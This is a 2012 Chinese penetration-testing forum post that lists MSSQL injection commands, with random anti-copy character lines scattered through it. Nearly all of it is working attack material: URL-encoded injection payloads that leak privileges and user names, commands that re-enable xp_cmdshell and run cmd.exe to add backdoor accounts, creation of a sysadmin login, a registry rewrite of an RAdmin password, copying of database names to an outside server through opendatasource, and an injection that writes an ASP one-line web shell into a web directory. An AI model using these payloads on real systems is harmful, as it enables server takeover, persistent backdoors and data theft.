中国网络渗透测试联盟
标题:
阿D常用的一些注入命令
[打印本页]
作者:
admin
时间:
2012-9-13 17:26
标题:
阿D常用的一些注入命令
阿D常用的一些注入命令
6 O$ C+ Q6 p- x8 g/ K& r" \
//看看是什么权限的
3 ^& T. q+ {% V7 s+ m
and 1=(Select IS_MEMBER('db_owner'))
4 g, ~$ x( M$ X& O- B. m
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
& Y# n f; P) r. r* o+ X
% d1 k; a; |5 d
//检测是否有读取某数据库的权限
' ?# z: u9 L; l5 e7 V
and 1= (Select HAS_DBACCESS('master'))
7 P9 G5 w% m: v) q
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
) L8 Q" f- c6 |1 e6 ]$ X. P
1 G& N+ w+ G$ g$ N% a
3 o/ W9 Z1 `8 g* S3 s4 H
数字类型
7 d9 M4 X! {% t7 S
and char(124)%2Buser%2Bchar(124)=0
9 E6 G& C( j/ ~. [, w: f8 u
! S: v: e Q: G$ r
字符类型
8 ~! N( r; e( F; \
' and char(124)%2Buser%2Bchar(124)=0 and ''='
" x$ t6 \' k- C; m$ }
+ M0 M( O. c- {1 Q; u* X; c
搜索类型
" V1 S5 l, ~% i" P, s/ b8 z
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
. o; f: O: u) j. q, j& u
1 _% h2 |1 E. S7 B
爆用户名
2 X; [6 y& Q! m
and user>0
6 m; @# @+ b/ N0 S0 o" k/ Y) {* B
' and user>0 and ''='
4 R1 V$ ]$ T' C1 ?
; u4 |& i1 W( o1 `- }
检测是否为SA权限
% i/ Q E5 F9 D ~" K
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
) W5 I" |& |- U3 E( Y
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
6 t/ f t2 K1 w0 [5 L( i2 E+ d
( F3 |: s5 _9 ]# |
检测是不是MSSQL数据库
7 r+ J W5 x: e# y! X6 o
and exists (select * from sysobjects);--
7 w5 [1 p" r' y1 o& w$ e) Y
2 F7 {; V# O* t0 K. A! |8 s
检测是否支持多行
A2 D, I$ H& H
;declare @d int;--
5 V% ^+ b6 E @6 J" o. L0 Z6 p* I* O
2 r/ r5 n1 x4 |/ b/ c
恢复 xp_cmdshell
3 N* b [/ |# E6 s
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
9 |' ]1 c& l" Z3 v7 _2 _
8 D# S& L5 a/ I% ]0 y7 s% \
( w$ P1 u! C. o' C4 m7 L7 H
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
4 C0 P- Y& B4 @5 V4 m# `6 [1 i' M
: B: m/ k' L! T* C
//-----------------------
% ]. D: h, F- Z; p8 |9 s
// 执行命令
! k8 E6 i b! [- d
//-----------------------
5 } e# Z4 Z8 k( ]
首先开启沙盘模式:
" q- ]% C; M$ G$ `
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
6 k3 A- h" s! W$ i
, s+ R0 e* U1 D+ \6 S
然后利用jet.oledb执行系统命令
1 b! o \9 q. F7 i* u
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
* M# @( t9 Z9 ]* H2 l; l' y8 K
* }5 M O! p x, W9 x7 W ?
执行命令
) w6 i. i+ b, e
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
" a" P! ]1 `7 \5 S! A7 H! O
: T) i9 g: `9 [6 v" P
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
; l' x. A4 X/ {: ~" l" s6 ^4 U
, I' N) o. R0 d7 V0 R7 U& x& i
判断xp_cmdshell扩展存储过程是否存在:
8 k7 r5 D$ x* y4 B5 o, L
http://192.168.1.5/display.asp?keyno=188
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
5 V, j- p! Q+ V0 {
- [- }/ K) c1 Z6 W/ w
写注册表
Z6 `# s/ g& j& {
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
7 Q5 s# Q. a- ~( Y, S$ e9 T+ a
6 _. j' i- _5 k
REG_SZ
* e2 `% R% R6 e9 g! J
0 f; y8 l/ x' X' J" I
读注册表
- l2 R/ V. ]' i* Z5 N' D
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
% {! l% @3 x$ a/ k( \8 C
0 D* q1 Q- e6 K) V) n6 C
读取目录内容
; s% r7 M; ^9 c
exec master..xp_dirtree 'c:\winnt\system32\',1,1
) l3 W; {2 i2 C
- m' [2 j+ u6 S$ r7 @6 p
& f) n1 z; K5 R) T
数据库备份
" ] H3 {6 l5 v$ ~! T" S* u5 W
backup database pubs to disk = 'c:\123.bak'
- e% Y! \- ?( X- R/ c! r
& L; k) R+ o* @8 P/ u+ |' P* t9 p
//爆出长度
! I& D0 ~8 @4 ~) n3 P" B
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
% F u; q1 ~; K6 |
' B3 z) {6 ]4 H, Y
+ P+ _9 l! ]+ |1 Q, K+ M
: o" K; m8 }2 x3 p- ]& ?+ M
更改sa口令方法:用sql综合利用工具连接后,执行命令:
; v- K; Z) x1 ~; U; G# p+ c
exec sp_password NULL,'新密码','sa'
" D/ | z( |6 r, J, w3 P1 v# O& I
* V) f( ?5 ?5 z1 x
添加和删除一个SA权限的用户test:
* e/ a% o+ W }4 {' P6 x8 @. `
exec master.dbo.sp_addlogin test,ptlove
1 u9 {: m8 H7 p3 f3 x/ p
exec master.dbo.sp_addsrvrolemember test,sysadmin
" ~4 {" `$ m! A0 ^$ s
+ R9 _0 X- r; m& y7 t1 Q5 W+ x
删除扩展存储过过程xp_cmdshell的语句:
+ }6 e1 y n( q% D6 a
exec sp_dropextendedproc 'xp_cmdshell'
7 J* s* E; J2 k+ ?8 M- l
5 ~: ?/ W' Z; H1 u N' t9 v
添加扩展存储过过程
6 [1 j" ~# P" H# Z/ ?2 _# ~2 [
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
; S! }# u) E: _% q4 F
GRANT exec On xp_proxiedadata TO public
$ m I, }/ }, J' v6 H: i
8 b8 y9 v* C! i8 B* A5 H: H: T4 K+ i- x
: ?0 J# w, q$ C) h/ d
停掉或激活某个服务。
$ E6 {& b8 G U* J) B' A X: _% P, b
; ^" X O( T6 B6 ^
exec master..xp_servicecontrol 'stop','schedule'
% ]5 u) Q. @& Y7 o4 I9 V& B8 C
exec master..xp_servicecontrol 'start','schedule'
; _' b) l" T) U% z9 C5 [7 m
( I" q e& i1 s. g8 i+ @
dbo.xp_subdirs
3 q! [. `; `; z, x
/ U. v7 Q0 n! |+ E# `: {( H2 m
只列某个目录下的子目录。
8 @# \9 K4 w# u! K; T
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
: F' i8 _# q* E
- |. z* V/ ?6 G8 j- @) b7 X# I: R
dbo.xp_makecab
( O$ e9 t3 o. p8 V( ` @; N5 `
( E. R9 P4 H4 g2 J/ o7 s) z
将目标多个档案压缩到某个目标档案之内。
1 v+ z5 p. Q4 r7 E
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
$ q w8 f; G9 o: ~! F
% H/ r6 k h! l: ?/ w7 }) a! k
dbo.xp_makecab
! I! d: v8 O$ M1 ^
'c:\test.cab','mszip',1,
3 f; O1 m* z/ l3 J
'C:\Inetpub\wwwroot\SQLInject\login.asp',
9 f( M0 W; D p6 W; K, \
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
1 g ]& _# B8 L, X& c+ E
1 i. l. l/ b9 O4 h
xp_terminate_process
3 M% N8 W# j' ?
+ ]. ]* x* r0 S9 r! g, R* y, d
停掉某个执行中的程序,但赋予的参数是 Process ID。
% l( R$ B- k$ A& C0 K' C" f
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
% z5 A; m( ~0 S) U6 \6 J) `
' v8 M) }+ r& D' \; J* u* U
xp_terminate_process 2484
T5 }4 |5 i3 t* u
W* ]) d* L4 _# l
xp_unpackcab
X8 L7 e5 A' }8 m6 P- Y; `) g2 L
9 z! k/ I, h+ F
解开压缩档。
" g0 R7 Q& ?+ ]# g8 [1 W
. Q( ]" I5 W8 T! g
xp_unpackcab 'c:\test.cab','c:\temp',1
3 c# A* C' |/ y
' W3 \( k J1 l* H
1 h( e; J7 s# z" A2 y$ z$ O
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
5 j$ F$ b6 ?* u9 K
9 y0 \9 h2 D2 b4 b0 g
create database lcx;
! w8 O: o2 e: A) I2 Q, e. ?
Create TABLE ku(name nvarchar(256) null);
+ f Q' s" A9 k
Create TABLE biao(id int NULL,name nvarchar(256) null);
4 _4 X# j" B* n
$ S; E) o( G$ S; t
//得到数据库名
5 O- F+ I o+ z. k
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
, ^4 o4 M# E+ B! y6 \, p& w2 C
$ o: }3 Q5 C+ s1 X
6 f! V4 |! ~& j! _. v
//在Master中创建表,看看权限怎样
) e/ p2 l( z6 z* C% o1 g
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
' [: S4 S! H; e1 T4 C
6 Z2 g; b1 R: W" u" X
用 sp_makewebtask直接在web目录里写入一句话马:
+ C4 `+ {$ e" [$ k9 _
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:
\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
$ m0 R' m+ x7 M5 N
1 ? B! O* X# z, ]
//更新表内容
7 [, I# U! p! L: c- f
Update films SET kind = 'Dramatic' Where id = 123
- W1 f, L8 N( n0 y
1 E) Z3 n* F; m2 o3 P- @1 r9 g( V% \
//删除内容
+ g6 u" m' `* g: f! u: h* I9 [! }- I
delete from table_name where Stockid = 3
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2